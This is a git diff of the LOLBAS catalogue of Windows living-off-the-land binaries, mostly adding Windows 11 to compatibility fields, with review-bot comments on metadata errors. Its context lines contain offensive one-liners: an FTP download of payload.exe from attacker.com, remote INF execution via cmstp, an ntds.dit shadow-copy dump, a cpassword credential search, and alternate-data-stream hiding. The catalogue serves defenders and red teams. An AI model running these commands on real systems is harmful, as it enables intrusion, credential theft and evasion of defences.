Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -encode inputFileName encodedOutputFileName Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decode encodedInputFileName decodedOutputFileName Description: Command to decode a Base64 encoded file. 
Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil --decodehex encoded_hexadecimal_InputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..20a8eff 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe - < fakefile.doc:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..c2ade63 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml 
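Review bot: The last certutil entry has the output file name in the wrong field: `Command: certutil --decodehex encoded_hexadecimal_InputFileName` is paired with `Description: Command to decode a hexadecimal-encoded file decodedOutputFileName`. The command should read `certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName` and the description should end at `file`. certutil's switches are written with a single dash elsewhere in this hunk, so the double dash looks like a typo too, though I have not verified whether certutil tolerates it.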
@@ -10,7 +10,7 @@ Commands:
 Category: Credentials
 Privileges: User
 MitreID: T1078
-OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\cmdkey.exe
 - Path: C:\Windows\SysWOW64\cmdkey.exe
diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml
index 275827c..ac47b2f 100644
--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@@ -10,7 +10,7 @@ Commands:
 Category: Download
 Privileges: User
 MitreID: T1105
-OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\cmdl32.exe
 - Path: C:\Windows\SysWOW64\cmdl32.exe
diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml
index 0f00d4e..776397d 100644
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@@ -10,7 +10,7 @@ Commands:
 Category: Execute
 Privileges: User
 MitreID: T1218.003
-OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
 Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
 Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml
index 148aa25..ba8ae98 100644
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
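Review bot: Only the first cmstp command's `OperatingSystem` gains Windows 11; the second entry in the same hunk (`cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf`, the remote-INF variant) is left unchanged, and the diffstat confirms this file has a single changed line. If the remote variant was also confirmed on 21H2 it should receive the same update; if it was not, a short note on the entry would stop readers assuming the omission is deliberate. The same partial update appears in Bitsadmin, where the copy-file entry is left out.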
@@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: User MitreID: T1218.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe @@ -23,7 +23,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension + - IOC: Control.exe executing library file without cpl extension - IOC: Suspicious network connections from control.exe Resources: - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..5f2487e 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml 
@@ -10,14 +10,14 @@ Commands:
 Category: Compile
 Privileges: User
 MitreID: T1127
-OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 - Command: csc -target:library File.cs
 Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
 Usecase: Compile attacker code on system. Bypass defensive counter measures.
 Category: Compile
 Privileges: User
 MitreID: T1127
-OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml
index 7a09cee..c3fe1b4 100644
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@@ -10,7 +10,7 @@ Commands:
 Category: ADS
 Privileges: User
 MitreID: T1564.004
-OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\cscript.exe
 - Path: C:\Windows\SysWOW64\cscript.exe
diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml
index 46fc551..ae8a566 100644
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@@ -10,7 +10,7 @@ Commands:
 Category: Download
 Privileges: User
 MitreID: T1105
-OperatingSystem: Windows 10
+OperatingSystem: Windows 10, Windows 11
 Full_Path:
 - Path: c:\windows\system32\desktopimgdownldr.exe
 Code_Sample:
diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml
index 075e45a..745d27d 100644
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@@ -10,7 +10,7 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a..4517e5c 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml 
@@ -10,42 +10,43 @@ Commands: Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. 
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o Description: Copies the source EXE to the destination EXE file Usecase: Use to copy files from one unc path to another Category: Download Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database Category: Copy Privileges: Admin MitreID: T1003.003 - OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server + OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server + Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4..12364a9 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml 
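Review bot: The new side of the Esentutl.yml hunk appears to add an empty `+` line between the last OperatingSystem entry and `Full_Path:` (the hunk grows from 42 to 43 lines with six replaced pairs), which runs against the formatting intent of this commit; if that is what the collapsed view hides, the blank line should be dropped. Independently, the UNC-to-UNC copy entry (`esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o`) is labelled `Category: Download` but carries `MitreID: T1564.004`, the ID every ADS entry on this page uses, whereas the Download and Copy entries in this file use `T1105`; it should read `MitreID: T1105`. Neither issue is introduced here, but both lines sit inside the hunk being rewritten.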
@@ -10,21 +10,21 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat Description: Copies source file to destination. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d467..9696d52 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml 
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 10 (Tested) + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c50dec4..5bc026c 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index c2d5851..c267520 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml 
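Review bot: In Explorer.yml the second command runs `explorer.exe C:\Windows\System32\notepad.exe` while its Description says `Execute calc.exe with the parent process spawning from a new instance of explorer.exe`; one of the two should change, e.g. `Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe`. The rewritten OperatingSystem line on the same entry also drops the `(Tested)` qualifier the old value carried, which is fine if Windows 11 was actually verified but is worth a word in the commit message so the loss of that signal is deliberate.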
@@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe Description: Command for copying calc.exe to another folder Usecase: Copy file Category: Copy Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 5f47e2f..7bbfa54 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml 
@@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /S /I cpassword \\sysvol\policies\*.xml Description: Search for stored password in Group Policy files stored on SYSVOL. Usecase: Find credentials stored in cpassword attrbute Category: Credentials Privileges: User MitreID: T1552.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. Usecase: Download/Copy file from webdav server Category: Download Privileges: User MitreID: T1185 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..45eebef 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml 
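Review bot: The fourth Findstr.yml entry (`findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe`) is `Category: Download` but carries `MitreID: T1185`, which does not match the `T1105` used for every other Download entry in this commit (Expand, Extrac32, Makecab, Hh, PrintBrm, IMEWDBLD, Desktopimgdownldr) and looks like a mistyped ID; suggest `MitreID: T1105`. The third entry's Usecase has a typo, `cpassword attrbute` → `cpassword attribute`. Both sit on context lines of the hunk this commit already rewrites.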
@@ -10,7 +10,7 @@ Commands: Category: ADS Privileges: Admin MitreID: T1562.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\fltMC.exe Code_Sample: diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index b8761ad..cc75117 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e..075846b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml 
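Review bot: Forfiles.yml's second Description says `Executes the evil.exe Alternate Data Stream (AD)`; the abbreviation used everywhere else on this page is `(ADS)`, so `Alternate Data Stream (ADS)`. The Privileges field is also spelled three ways across the files in this commit: FltMC.yml and the Esentutl `/vss` entry say `Admin`, Gpscript.yml, OfflineScannerShell.yml and Reg.yml say `Administrator`, and Regasm.yml says `Local Admin`; a consumer filtering on that field has to know all three, so settling on one value (the most common here is `Administrator`) would be worthwhile while these files are open.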
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 53d547f..b04e7c4 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index fcaf79f..714425a 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml 
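Review bot: In Ftp.yml the two entries now list different OS sets for the same binary, the first starting at `Windows 7` and the second at `Windows XP, Windows Vista`; if that difference is not deliberate the first line should be `OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11`. If it is deliberate, a short note in the commit message would stop the next formatting pass from "fixing" it.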
@@ -10,14 +10,14 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: HH.exe c:\windows\system32\calc.exe Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User MitreID: T1218.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2401ae7..d39d734 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -10,7 +10,7 @@ Commands: Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index cec66ea..f5efdd3 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 23bce1d..de74137 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml 
@@ -10,13 +10,14 @@ Commands: Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: ilasm.exe C:\public\test.txt /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile Privileges: User MitreID: T1127 + OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c..e28ba10 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56..6dc8ac7 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml 
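Review bot: The second Ilasm.yml entry still carries the template text `Usecase: A description of the usecase`, which the commit leaves in place while adding an OperatingSystem line directly below it; it should describe the actual use, e.g. `Usecase: Compile attacker code on system. Bypass defensive counter measures.` as the sibling Csc.yml and Jsc.yml entries do. The rewritten first line turns the old `Windows 10,7` into `Windows 7, Windows 10, Windows 11`, which is an improvement, but it omits `Windows 8` and `Windows 8.1` unlike every other .NET Framework entry in this commit; confirm that omission is intentional rather than inherited from the terse old value.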
@@ -10,14 +10,14 @@ Commands: Category: AWL bypass Privileges: User MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 57e8c83..9bfb036 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -10,14 +10,14 @@ Commands: Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: 